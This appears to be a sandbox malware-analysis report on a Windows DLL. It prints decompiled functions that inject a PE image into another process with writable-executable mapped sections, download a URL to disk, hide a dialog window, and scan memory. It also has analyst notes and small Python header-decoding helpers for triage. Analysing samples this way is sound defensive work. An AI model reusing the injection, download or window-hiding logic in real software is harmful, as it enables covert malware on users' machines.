    Instruction addresses of the statement lines in the C code above, in order: 0x6eca2646 0x6eca264c 0x6eca264f 0x6eca2658 0x6eca265e 0x6eca2664 0x6eca2665 0x6eca2669 0x6eca2687 0x6eca2692 0x6eca26b1 0x6eca26b5 0x6eca26c0 0x6eca26de 0x6eca26e9 0x6eca26f6 0x6eca270f 0x6eca2721 0x6eca2711 0x6eca2711 0x6eca2711 0x6eca270f 0x6eca272d 0x6eca272d 0x6eca2737 0x6eca2737 0x6eca2692 0x6eca2744

    APIs
    • RtlZeroMemory.NTDLL(?,00000008), ref: 6ECA2669
    • NtCreateSection.NTDLL ref: 6ECA268B
    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26B9
    • NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26E2
    • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 6ECA26F6
    • NtUnmapViewOfSection.NTDLL(?,?), ref: 6ECA2721
    • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6ECA272D
    • NtClose.NTDLL(?), ref: 6ECA2737
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
    • String ID:
    • API String ID: 1304417992-0
    • Opcode ID: 54b238ed8bc42120c225039a1e21a896c4dba2112db8c9ebd1329dba8dc14d84
    • Instruction ID: ace5b4eddb2893398e9993876e245fc4e1f8ecbe65f9516da53098959c2950fe
    • Opcode Fuzzy Hash: 54b238ed8bc42120c225039a1e21a896c4dba2112db8c9ebd1329dba8dc14d84
    • Instruction Fuzzy Hash: 0731FEB5204302BFE204DA99CD90E6BB7ADEBC8758F404E1DB7559B284E770ED048B62
    Uniqueness

    Uniqueness Score: -1.00%
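E6ECA2640 above reads e_lfanew at offset 0x3c of a buffer inside the DLL (the decompiler resolved the pointer to nearby manifest text, but the 0x3c/0x4550 check shows it is treated as a PE image), compares the DWORD at e_lfanew with 0x4550 ("PE\0\0"), and passes the DWORD at e_lfanew + 0x50 to NtCreateSection as the section size. That offset is Signature (4) + IMAGE_FILE_HEADER (20) + 0x38, i.e. OptionalHeader.SizeOfImage, which sits at the same offset in PE32 and PE32+. The section is requested with SECTION_MAP_WRITE|SECTION_MAP_READ|SECTION_MAP_EXECUTE (0xe), PAGE_EXECUTE_READWRITE (0x40) and SEC_COMMIT (0x8000000), mapped once into the current process (handle -1) and once into the target process handle, filled with SizeOfImage bytes from the buffer via RtlMoveMemory, and the local view is then unmapped, which leaves the copy only in the target. The Python below is an added example, not part of the report or the sample: it applies the same header check to a constructed PE header and returns the size the sample would request, adding the bounds checks the sample does not perform. The helper names and the constructed headers are mine.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D      # 'MZ'; the sample never checks it
IMAGE_NT_SIGNATURE = 0x00004550   # 'PE\0\0', compared as one DWORD like the sample
E_LFANEW = 0x3C
# e_lfanew + Signature(4) + IMAGE_FILE_HEADER(20) + OptionalHeader.SizeOfImage(0x38)
SIZEOFIMAGE = 0x50                # identical for PE32 (magic 0x10B) and PE32+ (0x20B)


def section_size_for(image: bytes):
    """Return the SizeOfImage E6ECA2640 would hand to NtCreateSection, or None when the
    buffer fails the same 'PE' check (the sample then returns 0 without mapping)."""
    if len(image) < E_LFANEW + 4:
        return None
    e_lfanew = struct.unpack_from("<I", image, E_LFANEW)[0]
    if e_lfanew + SIZEOFIMAGE + 4 > len(image):
        return None                   # bounds check the sample does not do
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        return None
    return struct.unpack_from("<I", image, e_lfanew + SIZEOFIMAGE)[0]


def build_headers(size_of_image, magic=0x10B, e_lfanew=0x40):
    """Constructed sample: DOS header + NT headers with no sections, enough to exercise
    the check. magic 0x10B builds PE32 (x86), 0x20B builds PE32+ (x64)."""
    dos = bytearray(e_lfanew)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, E_LFANEW, e_lfanew)
    is_pe32 = magic == 0x10B
    opt_size = 0xE0 if is_pe32 else 0xF0
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C if is_pe32 else 0x8664, 0, 0, 0, 0,
                           opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, 0x38, size_of_image)
    return bytes(dos) + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_hdr + bytes(opt)


if __name__ == "__main__":
    hdr = build_headers(0x12000)
    print(f"section size the sample would request: {section_size_for(hdr):#x}")
```

When triaging a dump, run `section_size_for` over the DLL's data blob at the address the decompiler shows for `_t58`: a non-None result tells you how large the injected image is, and comparing it with the raw blob length tells you whether the payload is stored already laid out as an image (the sample copies it in one RtlMoveMemory, with no per-section relocation).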

    C-Code - Quality: 100%
    			E6ECA7790(struct HWND__* _a4, int _a8, int _a12, long _a16) {
    				void* _t7;
    				void* _t8;
    				_Unknown_base(*)()* _t10;
    				long _t14;
    				void* _t17;
    				int _t20;
    				void* _t22;
    				void* _t24;
    				struct HWND__* _t25;
    				int _t26;
    				void* _t27;
    
    				_t20 = _a12;
    				_t26 = _a8;
    				_t25 = _a4;
    				_t27 = _t26 - 0x16;
    				if(_t27 > 0) {
    					if(_t26 == 0x18) {
    						goto L15;
    					} else {
    						if(_t26 == 0x112) {
    							_t7 = _t20 - 0xf020;
    							if(_t7 == 0) {
    								goto L15;
    							} else {
    								_t8 = _t7 - 0x10;
    								if(_t8 == 0 || _t8 == 0xf0) {
    									goto L15;
    								} else {
    									goto L19;
    								}
    							}
    						} else {
    							if(_t26 != 0x83fc) {
    								goto L19;
    							} else {
    								"one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t20;
    								M6ECB04C0 = CreateThread(0, 0, E6ECA6D50, 0, 0,  &M6ECB04C4);
    								goto L15;
    							}
    						}
    					}
    				} else {
    					if(_t27 == 0) {
    						PostMessageA(_t25, 0x10, 0, 0);
    						goto L19;
    					} else {
    						if(_t26 == 3 || _t26 == 7) {
    							L15:
    							return 0;
    						} else {
    							if(_t26 == 0x10) {
    								M6ECB04B0 = 1;
    								if(M6ECB04C0 != 0) {
    									_t14 = M6ECB04C4; // 0x0
    									PostThreadMessageA(_t14, _t26, 0, 0);
    									_t22 = M6ECB04C0; // 0x0
    									if(WaitForSingleObject(_t22, 0x1388) != 0) {
    										_t24 = M6ECB04C0; // 0x0
    										NtTerminateThread(_t24, 0);
    									}
    									_t17 = M6ECB04C0; // 0x0
    									CloseHandle(_t17);
    								}
    								PostQuitMessage(0);
    							}
    							L19:
    							_t10 = "one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    							return CallWindowProcW(_t10, _t25, _t26, _t20, _a16);
    						}
    					}
    				}
    			}
    Instruction addresses of the statement lines in the C code above, in order (0x00000000 where a line has no address of its own): 0x6eca7791 0x6eca7796 0x6eca779b 0x6eca779f 0x6eca77a2 0x6eca7835 0x00000000 0x6eca7837 0x6eca783d 0x6eca7876 0x6eca787b 0x00000000 0x6eca787d 0x6eca787d 0x6eca7880 0x00000000 0x00000000 0x00000000 0x00000000 0x6eca7880 0x6eca783f 0x6eca7845 0x00000000 0x6eca7847 0x6eca785b 0x6eca7867 0x00000000 0x6eca7867 0x6eca7845 0x6eca783d 0x6eca77a8 0x6eca77a8 0x6eca782a 0x00000000 0x6eca77aa 0x6eca77ad 0x6eca786e 0x6eca7871 0x6eca77bc 0x6eca77bf 0x6eca77cc 0x6eca77d6 0x6eca77d8 0x6eca77e3 0x6eca77e9 0x6eca77fd 0x6eca77ff 0x6eca7808 0x6eca7808 0x6eca780d 0x6eca7813 0x6eca7813 0x6eca781b 0x6eca781b 0x6eca7889 0x6eca788d 0x6eca78a0 0x6eca78a0 0x6eca77ad 0x6eca77a8

    APIs
    • PostThreadMessageA.USER32(00000000,?,00000000,00000000), ref: 6ECA77E3
    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 6ECA77F5
    • NtTerminateThread.NTDLL ref: 6ECA7808
    • CloseHandle.KERNEL32(00000000), ref: 6ECA7813
    • PostQuitMessage.USER32(00000000), ref: 6ECA781B
    • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 6ECA782A
    • CreateThread.KERNEL32 ref: 6ECA7861
    • CallWindowProcW.USER32(00000000,?,?,?,?), ref: 6ECA7897
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
    • String ID:
    • API String ID: 1229868629-0
    • Opcode ID: 4fdebfc6ad372e5d454cf9f83ebad16f2c2035aea85b7056f4cb19c9191e6d58
    • Instruction ID: 507e0650f3801da30db91ce5ba25667fca3f9af771d4705b202a9388ac33da4f
    • Opcode Fuzzy Hash: 4fdebfc6ad372e5d454cf9f83ebad16f2c2035aea85b7056f4cb19c9191e6d58
    • Instruction Fuzzy Hash: 38219A33640703ABEB109ADD8E59F9A7678F786705F000519FB55BB2C9E370D800EB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA5A00() {
    				char* _v16;
    				CHAR* _v36;
    				void* _v1048;
    				void _v1068;
    				long _v1076;
    				long _v1080;
    				void _v1084;
    				void* _v1088;
    				long _v1092;
    				long _v1096;
    				char* _t13;
    				long _t23;
    				void* _t27;
    				long _t33;
    				void* _t36;
    				void* _t38;
    
    				_t13 = M6ECB0518; // 0x0
    				_t33 = 0;
    				_t38 = InternetOpenA(_t13, 0, 0, 0, 0);
    				_v1048 = _t38;
    				if(_t38 != 0) {
    					_t27 = InternetOpenUrlA(_t38, _v16, 0, 0, 0x846a0000, 0);
    					if(_t27 != 0) {
    						_t36 = CreateFileA(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
    						if(_t36 != 0xffffffff) {
    							_v1080 = 0;
    							_v1076 = 0;
    							do {
    								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
    									goto L7;
    								} else {
    									_t23 = _v1096;
    									if(_t23 != 0) {
    										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
    										goto L7;
    									}
    								}
    								break;
    								L7:
    							} while (_v1096 > 0);
    							_t33 = 1;
    							CloseHandle(_t36);
    							_t38 = _v1088;
    						}
    						InternetCloseHandle(_t27);
    					}
    					InternetCloseHandle(_t38);
    				}
    				return _t33;
    			}
    Instruction addresses of the statement lines in the C code above, in order (0x00000000 where a line has no address of its own): 0x6eca5a06 0x6eca5a0d 0x6eca5a1a 0x6eca5a1c 0x6eca5a22 0x6eca5a40 0x6eca5a44 0x6eca5a68 0x6eca5a6d 0x6eca5a75 0x6eca5a79 0x6eca5a83 0x6eca5a97 0x00000000 0x6eca5a99 0x6eca5a99 0x6eca5a9f 0x6eca5aaf 0x00000000 0x6eca5aaf 0x6eca5a9f 0x00000000 0x6eca5ab1 0x6eca5ab1 0x6eca5ab9 0x6eca5abe 0x6eca5ac4 0x6eca5ac4 0x6eca5ac9 0x6eca5acf 0x6eca5ad1 0x6eca5ad7 0x6eca5ae2

    APIs
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6ECA5A14
    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 6ECA5A3A
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6ECA5A62
    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6ECA5A93
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ECA5AAF
    • CloseHandle.KERNEL32(00000000), ref: 6ECA5ABE
    • InternetCloseHandle.WININET(00000000), ref: 6ECA5AC9
    • InternetCloseHandle.WININET(00000000), ref: 6ECA5AD1
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
    • String ID:
    • API String ID: 2705228764-0
    • Opcode ID: aef716bebfbb05206519406342be0ac25c3d971e3ce4cf38c1b8e49e6f7536d4
    • Instruction ID: 043e67bedcbf38d539dbab188d82bbeb7c44903afe3db90e35375173e0e5304a
    • Opcode Fuzzy Hash: aef716bebfbb05206519406342be0ac25c3d971e3ce4cf38c1b8e49e6f7536d4
    • Instruction Fuzzy Hash: 09214171204746ABD220DE598D88FAB7ABCEBCA714F014A1DBE5593141E770E905CBB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA4E50(struct HINSTANCE__* _a4, WCHAR* _a8) {
    				signed int _t20;
    				struct HINSTANCE__* _t22;
    				int _t23;
    				struct HRSRC__* _t28;
    				void* _t29;
    				void* _t30;
    				void* _t32;
    
    				_t22 = _a4;
    				_t30 = 0;
    				_t28 = FindResourceW(_t22, _a8, 5);
    				if(_t28 == 0) {
    					return 0;
    				} else {
    					_t32 = LoadResource(_t22, _t28);
    					if(_t32 != 0) {
    						_t23 = SizeofResource(_t22, _t28);
    						_t29 = LockResource(_t32);
    						if(_t29 != 0) {
    							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
    							RtlMoveMemory(_t30, _t29, _t23);
    							_t20 =  *(_t30 + 0xc);
    							if((_t20 & 0x40000000) == 0) {
    								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
    							}
    							 *(_t30 + 0xc) = _t20 & 0xefffffff;
    							 *((intOrPtr*)(_t30 + 0x16)) = 0;
    						}
    						FreeResource(_t32);
    					}
    					return _t30;
    				}
    			}
    Instruction addresses of the statement lines in the C code above, in order: 0x6eca4e55 0x6eca4e5f 0x6eca4e67 0x6eca4e6b 0x6eca4ee9 0x6eca4e6d 0x6eca4e76 0x6eca4e7a 0x6eca4e85 0x6eca4e8d 0x6eca4e91 0x6eca4ea4 0x6eca4ea8 0x6eca4ead 0x6eca4eb5 0x6eca4ec6 0x6eca4ec6 0x6eca4ed0 0x6eca4ed3 0x6eca4ed3 0x6eca4ed7 0x6eca4ed7 0x6eca4ee3 0x6eca4ee3

    APIs
    • FindResourceW.KERNEL32(?,?,00000005), ref: 6ECA4E61
    • LoadResource.KERNEL32(?,00000000), ref: 6ECA4E70
    • SizeofResource.KERNEL32(?,00000000), ref: 6ECA4E7E
    • LockResource.KERNEL32(00000000), ref: 6ECA4E87
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6ECA4E96
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA4E9D
    • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6ECA4EA8
    • FreeResource.KERNEL32(00000000), ref: 6ECA4ED7
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
    • String ID:
    • API String ID: 1815471765-0
    • Opcode ID: 086af6a5469a6c8e54a7e8fae05a95aee2e359b638c4aa2470a7d14b8e94af96
    • Instruction ID: 413b66127525eab61832f96fa80a1a767996e742f7de20a3b4e65617e3572365
    • Opcode Fuzzy Hash: 086af6a5469a6c8e54a7e8fae05a95aee2e359b638c4aa2470a7d14b8e94af96
    • Instruction Fuzzy Hash: 8A113372600B06ABD7105AEEDC58E6BFFBDEB85765B114519FA16C3250EA34D8018B60
    Uniqueness

    Uniqueness Score: -1.00%
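In E6ECA4E50 above, FindResourceW with type 5 is RT_DIALOG, and the offsets the function patches in its heap copy (extended style at 8, style at 0xc, cx at 0x16) are the DLGTEMPLATEEX layout (dlgVer, signature, helpID, exStyle, style, cDlgItems, x, y, cx, cy). If the template's style lacks WS_CHILD (0x40000000) it clears WS_EX_APPWINDOW (0x40000, the 0xfffbffff mask) and sets WS_EX_NOACTIVATE|WS_EX_TOOLWINDOW (0x08000080); in every case it then strips WS_VISIBLE from the style (0xefffffff) and, with a single DWORD store at 0x16, zeroes both cx and cy. The dialog created from the patched template is therefore hidden, zero-sized, never activated and has no taskbar button. The Python below is an added example, not code from the sample or the report: it reproduces the patch on a constructed DLGTEMPLATEEX header so the before and after flags can be compared. The builder, the field decoder and the sample style values are mine.

```python
import struct

# Style bits involved in the sample's patch (winuser.h values)
WS_CHILD = 0x40000000
WS_VISIBLE = 0x10000000
WS_EX_APPWINDOW = 0x00040000
WS_EX_TOOLWINDOW = 0x00000080
WS_EX_NOACTIVATE = 0x08000000

# DLGTEMPLATEEX head: dlgVer(0) signature(2) helpID(4) exStyle(8) style(0xC)
# cDlgItems(0x10) x(0x12) y(0x14) cx(0x16) cy(0x18)
OFF_EXSTYLE, OFF_STYLE, OFF_CX = 0x08, 0x0C, 0x16
MASK32 = 0xFFFFFFFF


def build_dlgtemplateex(style, exstyle, cx, cy, x=10, y=10):
    """Constructed sample: the 26-byte fixed head of a DLGTEMPLATEEX with no controls."""
    return struct.pack("<HHIIIHhhhh", 1, 0xFFFF, 0, exstyle, style, 0, x, y, cx, cy)


def read_fields(tpl):
    """Decode the fields the patch touches plus the two properties an analyst cares about
    (taskbar_button is the simplified rule: WS_EX_APPWINDOW on, WS_EX_TOOLWINDOW off)."""
    exstyle, style = struct.unpack_from("<II", tpl, OFF_EXSTYLE)
    cx, cy = struct.unpack_from("<hh", tpl, OFF_CX)
    return {
        "style": style, "exstyle": exstyle, "cx": cx, "cy": cy,
        "visible": bool(style & WS_VISIBLE),
        "taskbar_button": bool(exstyle & WS_EX_APPWINDOW) and not exstyle & WS_EX_TOOLWINDOW,
    }


def patch_like_sample(tpl):
    """Apply the edits E6ECA4E50 makes to its heap copy of the RT_DIALOG resource."""
    buf = bytearray(tpl)
    style = struct.unpack_from("<I", buf, OFF_STYLE)[0]
    if not style & WS_CHILD:                      # top-level dialogs only
        exstyle = struct.unpack_from("<I", buf, OFF_EXSTYLE)[0]
        exstyle = (exstyle & ~WS_EX_APPWINDOW & MASK32) | WS_EX_NOACTIVATE | WS_EX_TOOLWINDOW
        struct.pack_into("<I", buf, OFF_EXSTYLE, exstyle)
    struct.pack_into("<I", buf, OFF_STYLE, style & ~WS_VISIBLE & MASK32)
    struct.pack_into("<I", buf, OFF_CX, 0)        # one DWORD store zeroes cx and cy
    return bytes(buf)


if __name__ == "__main__":
    WS_POPUP, WS_CAPTION = 0x80000000, 0x00C00000
    tpl = build_dlgtemplateex(WS_POPUP | WS_CAPTION | WS_VISIBLE, WS_EX_APPWINDOW, 200, 100)
    print("before:", read_fields(tpl))
    print("after: ", read_fields(patch_like_sample(tpl)))
```

The same decoder can be pointed at the real resource: extract the RT_DIALOG entry from the DLL, confirm bytes 0..3 are 01 00 FF FF (a DLGTEMPLATEEX), and compare `read_fields` on the raw resource with the copy recovered from the heap at runtime.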

    C-Code - Quality: 90%
    			E6ECA19F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				void* _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				char _v28;
    				intOrPtr _v32;
    				void* _v44;
    				intOrPtr _v172;
    				char _v356;
    				long _v360;
    				void* __edi;
    				void* __esi;
    				void* _t52;
    				void* _t69;
    				intOrPtr _t70;
    				intOrPtr* _t83;
    				signed int _t85;
    				intOrPtr _t88;
    
    				_t82 = _a4;
    				_t69 = 0;
    				if(_a4 != 0) {
    					_t91 = _a8;
    					_v44 = 0;
    					_v24 = 0;
    					_v16 = 0;
    					_v20 = 0;
    					_v4 = 0;
    					_t88 = E6ECA1400( &_v356, _t82, _a8);
    					if(_t88 != 0) {
    						_t83 = _a16;
    					} else {
    						_t70 = _a12;
    						_push( &_v356);
    						_t88 = E6ECA14E0(_t70);
    						if(_t88 != 0) {
    							_t83 = _a16;
    						} else {
    							_t88 = E6ECA15C0( &_v356, _t82, _t91, _t70);
    							if(_t88 != 0) {
    								L18:
    								_t83 = _a16;
    								goto L19;
    							} else {
    								_t88 = E6ECA1660( &_v356);
    								if(_t88 != 0) {
    									goto L18;
    								} else {
    									_t88 = E6ECA1720( &_v356);
    									if(_t88 != 0) {
    										if(_v24 != 0) {
    											_t85 = 0;
    											if(_v20 > 0) {
    												do {
    													FreeLibrary( *(_v24 + _t85 * 4));
    													_t85 = _t85 + 1;
    												} while (_t85 < _v20);
    											}
    											HeapFree(GetProcessHeap(), 0, _v24);
    										}
    										goto L18;
    									} else {
    										_t88 = E6ECA18D0( &_v356);
    										if(_t88 != 0) {
    											goto L18;
    										} else {
    											_t83 = _a16;
    											if(_t83 != 0) {
    												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
    												_v8 =  *((intOrPtr*)(_t83 + 0x30));
    											}
    											_t88 = E6ECA19A0( &_v356, _t70);
    											if(_t88 != 0) {
    												L19:
    												_push(0x8000);
    												_push( &_v360);
    												_push( &_v28);
    												_push(0xffffffff);
    												_v360 = 0;
    												L6ECAC2D6();
    											} else {
    												if(_t83 != 0) {
    													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
    													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
    													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
    													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
    													 *((intOrPtr*)(_t83 + 8)) = _t70;
    													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
    													 *(_t83 + 0x1c) = _v24;
    													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						_t52 = _v44;
    						if(_t52 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t52);
    						}
    						_t69 = 0;
    					}
    					if(_t83 != _t69) {
    						 *_t83 = _t88;
    					}
    					return _t88;
    				} else {
    					_t2 = _t69 - 2; // -2
    					return _t2;
    				}
    			}

    Instruction addresses: 0x6eca19f8 0x6eca19ff 0x6eca1a03 0x6eca1a12 0x6eca1a20 0x6eca1a27 0x6eca1a2e 0x6eca1a35 0x6eca1a3c 0x6eca1a48 0x6eca1a4f 0x6eca1be0 0x6eca1a55 0x6eca1a55 0x6eca1a60 0x6eca1a68 0x6eca1a6f 0x6eca1bba 0x6eca1a75 0x6eca1a81 0x6eca1a88 0x6eca1b90 0x6eca1b90 0x00000000 0x6eca1a8e 0x6eca1a96 0x6eca1a9d 0x00000000 0x6eca1aa3 0x6eca1aa8 0x6eca1aac 0x6eca1b4f 0x6eca1b51 0x6eca1b5a 0x6eca1b62 0x6eca1b6d 0x6eca1b6f 0x6eca1b70 0x6eca1b62 0x6eca1b8a 0x6eca1b8a 0x00000000 0x6eca1ab2 0x6eca1ab7 0x6eca1abb 0x00000000 0x6eca1ac1 0x6eca1ac1 0x6eca1aca 0x6eca1ad2 0x6eca1ad9 0x6eca1ad9 0x6eca1aea 0x6eca1af1 0x6eca1b97 0x6eca1b97 0x6eca1ba0 0x6eca1ba8 0x6eca1ba9 0x6eca1bab 0x6eca1bb3 0x6eca1af7 0x6eca1af9 0x6eca1b14 0x6eca1b1e 0x6eca1b28 0x6eca1b32 0x6eca1b39 0x6eca1b3c 0x6eca1b3f 0x6eca1b42 0x6eca1b42 0x6eca1af9 0x6eca1af1 0x6eca1abb 0x6eca1aac 0x6eca1a9d 0x6eca1a88 0x6eca1bc1 0x6eca1bca 0x6eca1bd6 0x6eca1bd6 0x6eca1bdc 0x6eca1bdc 0x6eca1be9 0x6eca1beb 0x6eca1beb 0x6eca1bf9 0x6eca1a06 0x6eca1a06 0x6eca1a10 0x6eca1a10

    APIs
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA1BCF
    • HeapFree.KERNEL32(00000000), ref: 6ECA1BD6
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeProcess
    • String ID:
    • API String ID: 3859560861-0
    • Opcode ID: 81c4801e870b1239c11fec86b1c90c191d6e900dd782a1419bc415cefec91a90
    • Instruction ID: e537ce5594d3cd7fd025495921d8b3fdae64ecb2059774503e12e4265785ff21
    • Opcode Fuzzy Hash: 81c4801e870b1239c11fec86b1c90c191d6e900dd782a1419bc415cefec91a90
    • Instruction Fuzzy Hash: E0514DB55087429BC3708F9DD880ADBB7F9BBC8354F014A2DDA8997344E735A849CBD2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E6ECA8400() {
    				intOrPtr _v4;
    				intOrPtr _v12;
    				intOrPtr _v28;
    				long _v40;
    				void _v44;
    				void* _v48;
    				intOrPtr _v56;
    				long _v80;
    				char _v88;
    				intOrPtr _v92;
    				void _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				long _v108;
    				intOrPtr _v116;
    				intOrPtr _v128;
    				long _v132;
    				long _t26;
    				long _t28;
    				long _t30;
    				void* _t31;
    				intOrPtr _t32;
    				intOrPtr _t42;
    				long _t44;
    				union _MEMORY_INFORMATION_CLASS _t47;
    				void* _t49;
    				intOrPtr _t52;
    
    				_t31 = 0;
    				_v80 = 0;
    				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80);
    				if(_v28 <= 0) {
    					return _t26;
    				} else {
    					_t52 = _v12;
    					_t42 = _v4;
    					do {
    						_push(0x1c);
    						_push( &_v88);
    						L6ECAC2EE();
    						_t47 = 0;
    						_v108 = 0;
    						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
    						if(_t28 >= 0 && _v128 == 0x1c) {
    							_t32 = _v116;
    							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
    								while(1) {
    									_t28 = _t47 + _t32;
    									__imp__RtlCompareMemory(_t52, _t28, _t42);
    									if(_t28 == _t42) {
    										break;
    									}
    									_t47 = _t47 + 1;
    									if(_t47 < _v116 - _t42) {
    										continue;
    									}
    									goto L11;
    								}
